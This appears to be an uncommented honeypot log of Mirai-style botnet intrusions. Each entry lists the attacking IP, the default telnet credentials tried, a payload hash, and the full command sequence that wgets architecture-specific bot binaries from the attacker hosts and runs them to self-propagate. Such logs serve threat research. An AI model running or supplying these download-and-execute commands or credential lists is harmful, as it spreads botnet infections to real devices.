| IP address |
User name |
Password |
SHA256 of the payload file |
 205.185.114.16
| admin | pass | 124e2cd684f102ce241852b5f312bbe3a0ba05e1b0d684321b37c092829794c8 |
linuxshell
sh
shell
enable
system
hostname shibui_1747
/bin/busybox SHIBUI
/bin/busybox ps; /bin/busybox SHIBUI
/bin/busybox cat /proc/mounts; /bin/busybox SHIBUI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SHIBUI
cd /
/bin/busybox cp /bin/echo fxlyazsxhy; >fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
/bin/busybox cat /bin/echo
/bin/busybox SHIBUI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SHIBUI
/bin/busybox wget http://205.185.114.16:80/bins/shibui.x86 -O - > fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
./fxlyazsxhy x86; /bin/busybox IUBIHS
/bin/busybox SHIBUI |
205.185.114.16 | root | jvbzd | fab1df6e23e3f965bcf9affaf708df5db1d9a1773f3dab011921a2c715b23715 |
linuxshell
sh
shell
enable
system
hostname shibui_4375
/bin/busybox SHIBUI
/bin/busybox ps; /bin/busybox SHIBUI
/bin/busybox cat /proc/mounts; /bin/busybox SHIBUI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SHIBUI
cd /
/bin/busybox cp /bin/echo fxlyazsxhy; >fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
/bin/busybox cat /bin/echo
/bin/busybox SHIBUI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SHIBUI
/bin/busybox wget http://205.185.114.16:80/bins/shibui.mpsl -O - > fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
./fxlyazsxhy mpsl; /bin/busybox IUBIHS
/bin/busybox SHIBUI |
 5.9.228.133
| root | root | b39b156898a5dc6db0fda3c4e73ea664cde47523b8c2d389e66726cad55c0d93 |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://5.9.228.133:80/bins/hoho.arm -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6 HOHO-U79OL
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://5.9.228.133:80/bins/hoho.arm7 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
64.20.40.46 | Administrator | buh | eebb2e1ad6ccf17186e1e6dc3eeafb15b0551c7eca243c11a3f3464716349642 |
enable
shell
sh
/bin/busybox OWARI
/bin/busybox ps; /bin/busybox OWARI
/bin/busybox cat /proc/mounts; /bin/busybox OWARI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox OWARI
cd /
/bin/busybox cp /bin/echo X19I239124UIU; >X19I239124UIU; /bin/busybox chmod 777 X19I239124UIU; /bin/busybox OWARI
/bin/busybox cat /bin/echo
/bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://64.20.40.46:80/Binarys/Owari.ppc -O - > X19I239124UIU; /bin/busybox chmod 777 X19I239124UIU; /bin/busybox OWARI
./X19I239124UIU owari.selfrep.wget; /bin/busybox IRAWO
rm -rf 289JU3414U891; > X19I239124UIU; /bin/busybox OWARI |
5.9.228.133 | root | root | 7255baffdf672e9f98be329f1b4b8a6030f7b480a2c989459b0d45d46558683e |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://5.9.228.133:80/bins/hoho.spc -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
 179.43.149.12
| adm | | 6cc5b8a76572249b258b94da8816c89076f92cde7c1bef7e0b89b2594f645a3d |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .dev001 s2m
/bin/busybox cp /bin/busybox .dev001; >.dev001; /bin/busybox chmod 777 .dev001; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://179.43.149.12:80/updating_32zs6f54f6rg1543tg32/ku.mips -O - > .dev001; /bin/busybox chmod 777 .dev001; /bin/busybox UNSTABLE
./.dev001 selfrep.mips; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.dev001; /bin/busybox UNSTABLE |
205.185.114.16 | admin | abc123 | 0bd9d4406a934ef6ff7066865149a91f5b85f830dfe5b54a454374dad9156b82 |
linuxshell
sh
shell
enable
system
hostname shibui_7312
/bin/busybox SHIBUI
/bin/busybox ps; /bin/busybox SHIBUI
/bin/busybox cat /proc/mounts; /bin/busybox SHIBUI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SHIBUI
cd /
/bin/busybox cp /bin/echo fxlyazsxhy; >fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
/bin/busybox cat /bin/echo
/bin/busybox SHIBUI
cat /proc/cpuinfo; uname -m; /bin/busybox SHIBUI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SHIBUI
/bin/busybox wget http://205.185.114.16:80/bins/shibui.arm -O - > fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
./fxlyazsxhy arm; /bin/busybox IUBIHS
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SHIBUI
/bin/busybox wget http://205.185.114.16:80/bins/shibui.arm7 -O - > fxlyazsxhy; /bin/busybox chmod 777 fxlyazsxhy; /bin/busybox SHIBUI
./fxlyazsxhy arm7; /bin/busybox IUBIHS
/bin/busybox SHIBUI |
192.236.160.254 | guest | 12345 | bf81e0e13d342a10a65f164e9f0dab0d21d2943176b9265a93883068f794523d |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Aka Aki
/bin/busybox cp /bin/busybox Aka; >Aka; /bin/busybox chmod 777 Aka; /bin/busybox AKIRAA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AKIRAA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AKIRAA
/bin/busybox wget http://192.236.160.254:80/jhewfiuhjfuef12/spc -O - > Aka; /bin/busybox chmod 777 Aka; /bin/busybox AKIRAA
./Aka telnet.spc.wget; /bin/busybox AKIRAAAAA
/bin/busybox rm -rf Aki; >Aka; /bin/busybox AKIRAA |